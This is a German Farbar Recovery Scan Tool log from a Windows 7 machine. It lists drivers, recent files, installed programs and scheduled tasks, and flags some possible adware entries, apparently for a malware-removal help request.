R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [107080 2012-10-29] (BitDefender LLC)
S4 BDVEDISK; C:\Windows\System32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2014-01-16] (DT Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [30424 2014-10-22] (Sony Mobile Communications)
R3 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [160032 2015-04-29] (BitDefender LLC)
S3 smhwser; C:\Windows\System32\DRIVERS\smhwser.sys [122624 2010-02-04] (QUALCOMM Incorporated)
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [477272 2015-06-02] (BitDefender S.R.L.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2014-07-28] (Apple, Inc.) [Datei ist nicht signiert]
S3 USBTINSP; C:\Windows\System32\DRIVERS\tinspusb.sys [142848 2010-03-29] (Texas Instruments)
S1 BdfNdisf; \??\c:\program files\common files\bitdefender\bitdefender firewall\bdfndisf6.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S1 innfd_1_10_0_14; system32\drivers\innfd_1_10_0_14.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S1 tbfd_1_10_0_16; system32\drivers\tbfd_1_10_0_16.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 X6va034; \??\C:\Windows\SysWOW64\Drivers\X6va034 [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 xspirit; \??\C:\Windows\xspirit.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-21 22:52 - 2015-12-21 22:59 - 00000000 ____D C:\FRST
2015-12-21 21:00 - 2015-12-21 21:00 - 00271808 _____ (Bitdefender) C:\Windows\system32\Drivers\ignis.sys
2015-12-21 20:24 - 2015-12-21 20:24 - 00420176 _____ C:\ProgramData\1450725283.bdinstall.bin
2015-12-21 20:19 - 2015-12-21 20:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2016
2015-12-21 20:19 - 2015-12-21 20:19 - 00002122 _____ C:\Users\Public\Desktop\Bitdefender 2016.lnk
2015-12-21 20:19 - 2015-12-21 20:19 - 00000684 ____H C:\bdr-cf01
2015-12-21 20:17 - 2015-12-21 20:27 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Bitdefender
2015-12-21 20:17 - 2015-12-21 20:19 - 00253404 ____H C:\bdr-ld01
2015-12-21 20:17 - 2015-12-21 20:19 - 00009216 ____H C:\bdr-ld01.mbr
2015-12-21 20:17 - 2015-12-15 21:35 - 49760229 ____H C:\bdr-im01.gz
2015-12-21 20:17 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\Windows\system32\Drivers\bdvedisk.sys
2015-12-21 20:17 - 2015-10-28 13:01 - 01600512 _____ (BitDefender) C:\Windows\system32\Drivers\avc3.sys
2015-12-21 20:17 - 2015-09-17 21:24 - 00282000 _____ (BitDefender) C:\Windows\system32\Drivers\avchv.sys
2015-12-21 20:17 - 2015-09-17 21:23 - 00775424 _____ (BitDefender) C:\Windows\system32\Drivers\avckf.sys
2015-12-21 20:17 - 2013-08-13 12:38 - 03271472 ____H C:\bdr-bz01
2015-12-21 20:14 - 2015-06-02 14:21 - 00477272 _____ (BitDefender S.R.L.) C:\Windows\system32\Drivers\trufos.sys
2015-12-21 20:14 - 2015-04-29 13:32 - 00160032 _____ (BitDefender LLC) C:\Windows\system32\Drivers\gzflt.sys
2015-12-21 20:11 - 2015-12-21 22:16 - 00000000 ____D C:\Program Files\Bitdefender Agent
2015-12-21 20:11 - 2015-12-21 20:11 - 00003640 _____ C:\Windows\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2015-12-21 12:32 - 2015-12-21 12:53 - 00000249 _____ C:\Users\Özkan\Desktop\Neues Textdokument.txt
2015-12-19 22:03 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2015-12-19 09:34 - 2015-12-19 09:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fraps
2015-12-18 22:14 - 2015-12-18 22:14 - 00001037 _____ C:\Users\Özkan\Documents\R50234.txt
2015-12-18 19:46 - 2015-12-18 19:46 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2015-12-18 19:36 - 2015-12-21 22:24 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-18 19:36 - 2015-12-19 18:49 - 00000000 ____D C:\Users\Özkan\Desktop\Bewerbungen Etc
2015-12-18 19:36 - 2015-12-18 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-17 20:05 - 2015-12-17 20:05 - 00019336 _____ C:\Windows\System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C}
2015-12-09 20:18 - 2015-12-09 20:18 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2015-12-08 21:35 - 2015-12-08 21:35 - 00001147 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-08 21:34 - 2015-12-08 21:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Program Files\Common Files\AV
2015-12-08 21:30 - 2015-12-09 15:05 - 00000000 ____D C:\ProgramData\AVAST Software
2015-12-08 21:09 - 2015-12-21 22:20 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-08 21:09 - 2015-12-21 21:20 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-08 21:09 - 2015-12-08 21:15 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-08 21:09 - 2015-12-08 21:15 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{30aa3bf1-20c8-0}
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{029b1f57-60c8-1}
2015-12-04 21:54 - 2015-12-07 15:23 - 00000000 ____D C:\Users\Özkan\Documents\AnotherLife-Keybinder
2015-12-04 17:45 - 2015-12-04 17:47 - 00000000 ____D C:\Program Files\Microsoft Office
2015-11-25 21:06 - 2015-11-25 21:06 - 00000000 ____D C:\Users\Özkan\Documents\Razer

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-12-21 22:56 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-21 22:38 - 2013-07-29 20:28 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-12-21 21:30 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-21 21:30 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-21 21:00 - 2014-01-20 19:03 - 00000000 ____D C:\ProgramData\Bitdefender
2015-12-21 20:27 - 2014-11-09 22:57 - 00143047 _____ C:\bdlog.txt
2015-12-21 20:19 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-21 20:14 - 2015-08-25 07:55 - 00000000 ____D C:\Program Files\Bitdefender
2015-12-21 20:14 - 2014-01-20 19:02 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
2015-12-21 20:11 - 2014-01-17 14:11 - 00001328 _____ C:\Windows\Tasks\Plus-HD-5.0-updater.job
2015-12-21 20:11 - 2014-01-17 14:11 - 00001130 _____ C:\Windows\Tasks\Plus-HD-5.0-enabler.job
2015-12-21 20:10 - 2014-01-17 14:10 - 00002104 _____ C:\Windows\Tasks\Plus-HD-5.0-firefoxinstaller.job
2015-12-21 20:10 - 2014-01-17 14:10 - 00001972 _____ C:\Windows\Tasks\Plus-HD-5.0-chromeinstaller.job
2015-12-21 20:04 - 2013-12-23 19:37 - 00000436 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2015-12-21 20:04 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-21 13:59 - 2015-06-06 05:04 - 00000000 ____D C:\Users\Özkan\AppData\Local\CrashDumps
2015-12-21 13:15 - 2015-08-16 06:15 - 00000340 _____ C:\Windows\Tasks\Superclean.job
2015-12-19 21:10 - 2014-08-18 15:45 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\.minecraft
2015-12-19 20:04 - 2014-01-16 14:09 - 00000000 ____D C:\Users\Özkan\AppData\Local\ElevatedDiagnostics
2015-12-19 09:34 - 2015-10-05 22:17 - 00000000 ____D C:\Fraps
2015-12-19 08:12 - 2014-03-27 18:54 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2015-12-18 19:46 - 2015-06-15 13:20 - 00000000 ____D C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client
2015-12-18 19:14 - 2014-04-26 15:58 - 00000000 ____D C:\ProgramData\Origin
2015-12-18 19:13 - 2015-08-15 06:58 - 00000000 ____D C:\Program Files (x86)\Warlord II
2015-12-15 13:59 - 2009-07-14 06:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-12-13 13:02 - 2015-10-08 12:54 - 00000000 ____D C:\Users\Ã–zkan\AppData\Local\Steam
2015-12-10 17:16 - 2014-02-18 15:55 - 00000000 ____D C:\temp
2015-12-10 17:03 - 2015-05-14 11:57 - 00000000 ____D C:\Users\Özkan\AppData\Local\SmartWeb
2015-12-10 16:26 - 2015-08-15 06:31 - 00000000 ____D C:\Program Files (x86)\SmoothScroll
2015-12-10 16:23 - 2009-07-14 18:58 - 00704504 _____ C:\Windows\system32\perfh007.dat
2015-12-10 16:23 - 2009-07-14 18:58 - 00152310 _____ C:\Windows\system32\perfc007.dat
2015-12-10 16:23 - 2009-07-14 06:13 - 01634288 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-10 16:21 - 2014-09-30 16:38 - 01057280 ___SH C:\Users\Özkan\Desktop\Thumbs.db
2015-12-09 16:38 - 2013-07-29 20:28 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-09 16:38 - 2013-07-29 20:28 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-09 16:38 - 2013-07-29 20:28 - 00003822 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-12-09 13:53 - 2015-08-25 18:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-08 21:35 - 2015-10-06 17:25 - 00001159 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mirillis
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\Program Files (x86)\Mirillis
2015-12-08 21:25 - 2015-10-03 08:31 - 00000000 ____D C:\Program Files (x86)\AnotherLifeClient
2015-12-08 20:57 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-11-25 23:53 - 2015-09-16 16:42 - 00000000 ____D C:\Program Files (x86)\Razer
2015-11-25 21:50 - 2014-08-23 22:55 - 00035328 ___SH C:\Users\Özkan\Thumbs.db
2015-11-25 21:47 - 2014-01-26 13:08 - 00000000 ____D C:\Users\Özkan\AppData\Local\Razer
2015-11-25 21:47 - 2014-01-26 13:07 - 00000000 ____D C:\ProgramData\Razer
2015-11-25 21:09 - 2014-01-30 20:07 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\TeamViewer
2015-11-25 20:08 - 2015-09-08 11:49 - 00000000 ____D C:\Users\Özkan\Documents\Files

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-12-11 15:57 - 2013-12-11 15:57 - 2791563 _____ () C:\Program Files\oodr.chm
2013-12-11 18:58 - 2013-12-11 18:58 - 1755432 _____ (O&O Software GmbH) C:\Program Files\oodrrs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 3407656 _____ (O&O Software GmbH) C:\Program Files\oodrsurs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 6164264 _____ (O&O Software GmbH) C:\Program Files\oodskrec.exe
2013-10-09 14:22 - 2013-10-09 14:22 - 1016624 _____ (O&O Software GmbH) C:\Program Files\ooliveupdate.exe
2013-12-10 15:46 - 2013-12-10 15:46 - 6562600 _____ (O&O Software GmbH) C:\Program Files\oorwiz3.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 0164136 _____ (O&O Software GmbH) C:\Program Files\oorwiz3r.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 4554536 _____ (O&O Software GmbH) C:\Program Files\oosu.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 4900648 _____ (O&O Software GmbH) C:\Program Files\ooviewer.dll
2013-12-11 16:06 - 2013-12-11 16:06 - 0001755 _____ () C:\Program Files\readme.txt
2015-11-07 17:58 - 2015-11-07 18:02 - 6420480 _____ () C:\Program Files (x86)\GUT87EA.tmp
2015-06-24 19:34 - 2015-06-26 22:40 - 0000079 _____ () C:\Program Files (x86)\prefs.js
2015-07-22 12:45 - 2015-08-14 14:53 - 0000020 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr2.bin
2015-08-15 06:29 - 2015-08-25 07:48 - 0000024 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr25.bin
2014-07-08 18:34 - 2014-07-08 18:34 - 0000000 ___SH () C:\Users\Özkan\AppData\Local\LumaEmu
2015-06-27 12:06 - 2015-06-27 12:06 - 0000000 _____ () C:\Users\Özkan\AppData\Local\Temp.dat
2015-12-21 20:24 - 2015-12-21 20:24 - 0420176 _____ () C:\ProgramData\1450725283.bdinstall.bin
2015-08-14 20:57 - 2015-08-14 20:57 - 0000006 __RSH () C:\ProgramData\37d3abf93dbe04b7eb83987cae627f61c2b48eeb

==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2015-12-19 19:57

==================== Ende von FRST.txt ============================

--- --- ---

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:20-12-2015
durchgeführt von Özkan (2015-12-21 23:01:56)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-29 18:30:24)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1539430812-113463742-2149372525-500 - Administrator - Disabled)
Gast (S-1-5-21-1539430812-113463742-2149372525-501 - Limited - Disabled) => C:\Users\Gast.EasyNote
HomeGroupUser$ (S-1-5-21-1539430812-113463742-2149372525-1010 - Limited - Enabled)
Özkan (S-1-5-21-1539430812-113463742-2149372525-1000 - Administrator - Enabled) => C:\Users\Özkan

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D}
AS: Bitdefender Antispyware (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.228 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.3.133 - Adobe Systems, Inc.)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 20.0.23.1252 - Bitdefender)
Bitdefender Antivirus Plus 2016 (HKLM\...\Bitdefender) (Version: 20.0.24.1290 - Bitdefender)
Broadcom Card Reader Driver Installer (HKLM\...\{4710662C-8204-4334-A977-B1AC9E547819}) (Version: 15.0.7.3 - Broadcom Corporation)
Broadcom NetLink Controller (HKLM\...\{C91DCB72-F5BB-410D-A91A-314F5D1B4284}) (Version: 15.0.7.1 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Druckerdeinstallation für EPSON WF-2540 Series (HKLM\...\EPSON WF-2540 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
ETDWare PS/2-X64 10.6.9.9_WHQL (HKLM\...\Elantech) (Version: 10.6.9.9 - ELAN Microelectronic Corp.)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Fraps (HKLM-x32\...\Fraps) (Version:  - )
GetDataBack for NTFS (HKLM-x32\...\{56582EEA-3AEF-4D84-8B9D-C87A3CD9250F}) (Version: 4.32.000 - Runtime Software)
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.2.1410 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{09536BA1-E498-4CC3-B834-D884A67D7E34}) (Version: 1.23.605.1 - Intel Corporation)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Launch Manager (HKLM-x32\...\LManager) (Version: 5.1.15 - Packard Bell)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{929CE49F-1CA7-4CF3-A9A1-6D757443C63F}) (Version: 1.2.0241 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft-Maus- und Tastatur-Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 42.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 de)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0 - Mozilla)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 3.0 - Qualcomm Atheros)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6543 - Realtek Semiconductor Corp.)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.14.14.201410081526 - Sony Mobile Communications AB)
Sony PC Companion 2.10.228 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.228 - Sony)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.42849 - TeamViewer)
Unity Web Player (HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\UnityWebPlayer) (Version: 5.0.3f2 - Unity Technologies ApS)
Unlocker 1.9.1-x64 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb)
VLC media player 2.0.7 (HKLM\...\VLC media player) (Version: 2.0.7 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 4.20 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1539430812-113463742-2149372525-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll => Keine Datei

==================== Wiederherstellungspunkte =========================

13-12-2015 19:00:24 Windows-Sicherung
19-12-2015 22:02:37 DirectX wurde installiert
20-12-2015 20:38:23 Windows-Sicherung

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2015-12-21 22:27 - 00000870 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {2F9EFD6F-C190-4C5F-91E4-8DC29081871B} - System32\Tasks\{1E300C01-90FD-450F-BD1E-62BCCA98B390} => Firefox.exe hxxp://ui.skype.com/ui/0/7.0.0.102/de/abandoninstall?source=lightinstaller&amp;page=tsBing
Task: {37CB84A8-AF35-4644-BC84-4A252074B883} - System32\Tasks\{DB07113B-F9D0-4E65-8E56-D804EE5D12B8} => pcalua.exe -a C:\Users\Özkan\Downloads\Setup_Lugiiis_Keybinder.exe -d C:\Users\Özkan\Downloads
Task: {406F344E-CE65-40F7-AEB2-AAB9E5EB5373} - \Plus-HD-5.0-enabler -> Keine Datei <==== ACHTUNG
Task: {426C61DF-B730-404B-B36D-C2DCDB58B6F8} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2015-11-09] (Bitdefender)
Task: {5092819E-84BA-4BC9-869E-FAB88E5A99C3} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
